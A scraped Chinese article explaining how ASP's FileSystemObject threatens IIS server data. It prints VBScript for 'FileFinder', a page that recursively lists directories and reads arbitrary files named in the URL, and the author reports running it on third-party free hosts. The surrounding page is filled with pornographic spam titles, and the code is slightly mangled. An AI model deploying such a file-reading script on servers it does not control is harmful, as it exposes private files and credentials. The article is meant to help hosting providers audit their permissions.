婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

熱門標簽:怎么在地圖標注自己 縣域地圖標注打印店 萊西電子地圖標注 個人可以辦理400電話么 外呼系統API接口 鳳臺百度地圖標注店 武夷山旅游地圖標注 修改地圖標注 金昌電話機器人價格
scripting.filesystemobject 對象是由 scrrun.dll 提供的許多供 vbscript/jscript 控制的 com 對象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目錄的訪問,但是同時也對 iis web 服務器數據安全造成了一定的威脅。

filefinder 的代碼很簡單,由3 個函數和 30 行左右的順序代碼構成。

最關鍵的是 findfiles 函數,通過對它的遞歸調用實現對某個目錄的遍歷,并且按照特定的文件擴展名來搜尋這些文件。


function findfiles(strstartfolder, strext)

dim n

dim othisfolder

dim ofolders

dim ofiles

dim ofolder

dim ofile


' 如果系統管理員對文件系統的權限進行細致的設置話,下面的代碼就要出錯

' 但是有些目錄還是可以察看的,所以我們簡單的把錯誤忽略過去

on error resume next

n = 0

response.write "b>searching " strstartfolder "/b>br>"

set othisfolder = g_fs.getfolder(strstartfolder)

set ofiles = othisfolder.files

for each ofile in ofiles

' 如果是指定的文件擴展名,輸出連接導向本身,但用不同的命令 cmd

' 在這里是 cmd=read,即讀出指定物理路徑的文本文件

if issuffix(ofile.path, strext) then

response.write "a target=_blank href='ff.asp?cmd=readpath=" server.htmlencode(ofile.path) "'>font color='dodgerblue'>" ofile.path "/font>/a>br>"

if err = 0 then

n = n + 1

end if

end if

next

set ofolders = othisfolder.subfolders

for each ofolder in ofolders

n = n + findfiles(ofolder.path, strext)

next

findfiles = n

end function

下面的代碼是對 url 后面的參數進行分析:


' 讀出各個參數的值

strcmd = ucase(request.querystring("cmd"))

strpath = request.querystring("path")

strext = request.querystring("ext")

brawdata = ucase(request.querystring("raw"))

' 默認搜索 .asp 文件

if strpath = "" then

strpath = "."

end if

if strext = "" then

strext = ".asp"

end if


' 根據不同的命令 cmd 執行不同的代碼

select case strcmd

case "find"

response.write findfiles(strpath, strext) " file(s) found"

case "read"

if brawdata = "t" then

response.write readtextfile(strpath)

else

response.write "pre>" server.htmlencode(readtextfile(strpath)) "/pre>"

end if

case else

response.write "h3>please specify a command to execute/h3>"

end select

從上面的分析可以看出,如果有足夠的權限的話,我們就可以通過 filefinder 來查找 iis web 服務器上的任意文本文件,并且可以輕松的察看文件內容。對于非文本文件,可以確定他們是否存在及其所在路徑,這對于高級 hacker 們來說,這些信息有時是極其重要的。

但是這些對數據安全的威脅的前提條件是執行 ff.asp 的用戶至少擁有讀取目錄和文件的權限。由于 windows nt server 在安裝后的默認安全設置是所有用戶都可以“讀取”目錄和文件,所以不管是 iis 默認的你名用戶 iusr_servername 還是別的什么用戶,都可以順列的讀取目錄和文件的信息。而大多數 windows nt server系統管理員主要關心系統是否能夠運行的起來,一般不愿意去改動默認的目錄和文件權限,畢竟那樣做要冒很大的風險,而且需要很多次得經驗。所以,我們可以用 filefinder 來檢查作為 web 服務器的 nt server 的文件系統的安全設置是否安全。

作者專門對作為 iis web 服務器的文件系統的權限進行了人工設置,但限于沒有經驗,導致了許多奇怪的錯誤現象,如:所用的做實驗的 nt server 4.0 不能進行 access 數據庫的連接。而在進行文件系統權限改動之前,這些功能是正常的。

本著純粹研究的目的,作者還在我所申請的免費 asp 空間上作了試驗(包括 csdn 提供的我的個人主頁),結果是 filefinder 都可以順利運行。而在http://www2.domaindlx.com/index.html 申請的個人主頁卻沒有這個問題,可見這個免費 asp 主頁提供商在這方面做的還是比較認真的。盡管 domaindlx 的 web 服務器運行在 windows 2000 server 上的,其默認的文件系統的安全權限和 nt 4.0 沒有很大的差別。

由于作者的能力有限,就對這個問題討論到這里。僅以此文來向國內的 asp 主頁提供商提供參考意見,希望能對提供商和客戶雙方的數據安全都有所幫助。

附:用其它類似的服務器端腳本來運行的 web 服務,如果也提供類似 scripting.filesystemobject 的對文件系統操作的功能,不管什么平臺應該存在同樣的問題。

標簽:楚雄 清遠 涼山 通遼 上海 赤峰 邢臺 南京

巨人網絡通訊聲明:本文標題《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》,本文關鍵詞  ASP,中,FSO,對象,對,IIS,WEB,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》相關的同類信息!
  • 本頁收集關于ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    亚洲不卡av一区二区三区| 成人午夜视频在线| 国产suv精品一区二区三区| 成人晚上爱看视频| 欧美一区二区网站| 亚洲小说欧美激情另类| aaa亚洲精品一二三区| 国产日韩欧美精品电影三级在线| 久久激情五月激情| 在线成人午夜影院| 午夜精品久久久久久久久久久| 91网站在线播放| 17c精品麻豆一区二区免费| 国产sm精品调教视频网站| 国产日韩精品一区二区浪潮av | 日本aⅴ亚洲精品中文乱码| 欧美亚洲动漫制服丝袜| 亚洲免费观看在线视频| 91视频你懂的| 亚洲免费高清视频在线| 色婷婷综合在线| 亚洲欧美电影院| 99久久精品国产导航| 欧美国产一区在线| 韩国成人福利片在线播放| 精品国产区一区| 国产剧情一区二区三区| 日韩一区二区三区观看| 亚洲美女视频在线观看| eeuss鲁片一区二区三区| 久久亚洲一区二区三区四区| 午夜精品免费在线观看| 青青青爽久久午夜综合久久午夜| 91.xcao| 国产精品每日更新在线播放网址| 视频一区在线视频| 国产aⅴ精品一区二区三区色成熟| 欧美国产日本视频| 亚洲高清免费视频| 丁香一区二区三区| 日韩一区二区免费电影| av在线播放不卡| 亚洲精品成人天堂一二三| 精品亚洲porn| 欧美伊人久久久久久久久影院| 2023国产精品视频| 国产91露脸合集magnet| 9191国产精品| 一区二区三区在线看| 国产99久久久国产精品潘金| 成人av在线资源网站| 亚洲乱码一区二区三区在线观看| 久久精品国产亚洲5555| 日本高清不卡在线观看| 国产精品国产三级国产aⅴ入口 | 91小视频在线| 日韩黄色小视频| 国产调教视频一区| 久久午夜电影网| jiyouzz国产精品久久| 精品久久人人做人人爽| 天堂成人免费av电影一区| 亚洲精品videosex极品| 欧美一区二区三区免费视频| 亚洲精品免费播放| 99久久99久久免费精品蜜臀| 91色在线porny| 精品一区中文字幕| 91精品国产全国免费观看 | 亚洲国产精品激情在线观看| 蜜臀av一级做a爰片久久| 精品亚洲国内自在自线福利| 麻豆成人免费电影| 日韩一区二区中文字幕| 日产精品久久久久久久性色| 麻豆成人在线观看| 婷婷综合另类小说色区| 欧美日韩一区二区三区视频| 亚洲福中文字幕伊人影院| 久久97超碰色| 丝袜亚洲精品中文字幕一区| 欧美电影在线免费观看| 日本午夜一本久久久综合| 色综合色狠狠天天综合色| 国产成人综合亚洲91猫咪| 国产婷婷一区二区| 国产高清不卡二三区| 国产精品久久久久aaaa| 日本一区二区三区视频视频| 国产成人午夜电影网| 国产精品欧美精品| 欧美三级电影网站| 亚洲高清免费一级二级三级| 国产精品18久久久久| 国产欧美一区二区三区在线看蜜臀| 麻豆精品视频在线观看| 经典一区二区三区| 日韩精品一二三| 精品精品国产高清a毛片牛牛 | 亚洲精品免费一二三区| 欧美综合一区二区| 91捆绑美女网站| 午夜a成v人精品| 99精品国产一区二区三区不卡| 日韩理论片网站| 欧美一级黄色录像| 国产不卡视频在线观看| 久久精品视频在线免费观看| av一区二区不卡| 一本到一区二区三区| 亚洲福利一二三区| 久久―日本道色综合久久| gogo大胆日本视频一区| 一本大道av伊人久久综合| 亚洲aⅴ怡春院| 国产日韩在线不卡| 极品少妇xxxx精品少妇| 国产一区二区剧情av在线| 国产精品动漫网站| 91精品国产综合久久久久久久| 国内外成人在线视频| 亚洲午夜视频在线| 久久影院视频免费| 色香色香欲天天天影视综合网| 亚洲欧美aⅴ...| 成人性色生活片免费看爆迷你毛片| 欧美一卡二卡在线| 亚洲精品在线观看视频| 美女网站在线免费欧美精品| www亚洲一区| 国产主播一区二区三区| 99国产精品视频免费观看| 午夜精品福利久久久| 久久久久久久久久久久久久久99| 久久99久久99精品免视看婷婷| 激情综合一区二区三区| 国产精品久久久久影院老司| 91精品国产91久久久久久一区二区 | 欧美日韩另类国产亚洲欧美一级| 五月激情综合婷婷| 国产亚洲综合在线| 欧美日韩综合在线| fc2成人免费人成在线观看播放| 中国av一区二区三区| 一区二区三区中文字幕在线观看| 久久久久九九视频| 91精品国产综合久久精品app| 色婷婷狠狠综合| 成人av在线一区二区| 国产精品一区二区久激情瑜伽| 国产夜色精品一区二区av| 亚洲成人动漫av| 亚洲国产成人高清精品| 亚洲乱码精品一二三四区日韩在线 | 伊人一区二区三区| 国产色综合一区| 91精品国产综合久久福利软件| 日韩一区二区高清| 欧美日韩国产乱码电影| 欧美日韩一级视频| 视频一区二区中文字幕| 国内精品视频666| 国产综合色产在线精品| 人人狠狠综合久久亚洲| 成人丝袜18视频在线观看| av中文字幕不卡| av综合在线播放| 91色.com| 久久久精品人体av艺术| 久久久久久久久99精品| 久久久久久久久久久电影| 色94色欧美sute亚洲线路一ni| 91国偷自产一区二区使用方法| 欧美日韩精品一区二区三区蜜桃 | 欧美日韩久久久一区| 欧美日韩精品免费观看视频 | 99re6这里只有精品视频在线观看 99re8在线精品视频免费播放 | 亚洲综合成人在线视频| 国产成人av影院| 国产精品白丝jk白祙喷水网站| 国产精品一区不卡| 一区二区三区四区在线播放| 国产精品一区二区免费不卡| av不卡在线播放| 色婷婷香蕉在线一区二区| 国产精品日韩精品欧美在线| 亚洲美女一区二区三区| 亚洲大片一区二区三区| 国产色综合一区| 懂色av一区二区三区蜜臀| 91香蕉视频黄| 欧美疯狂做受xxxx富婆| 午夜不卡av在线| 韩国女主播成人在线观看| 国产成人av一区| 国产女人水真多18毛片18精品视频 | 欧美日韩二区三区| 精品国产乱码久久| 韩国三级中文字幕hd久久精品| 成人精品鲁一区一区二区|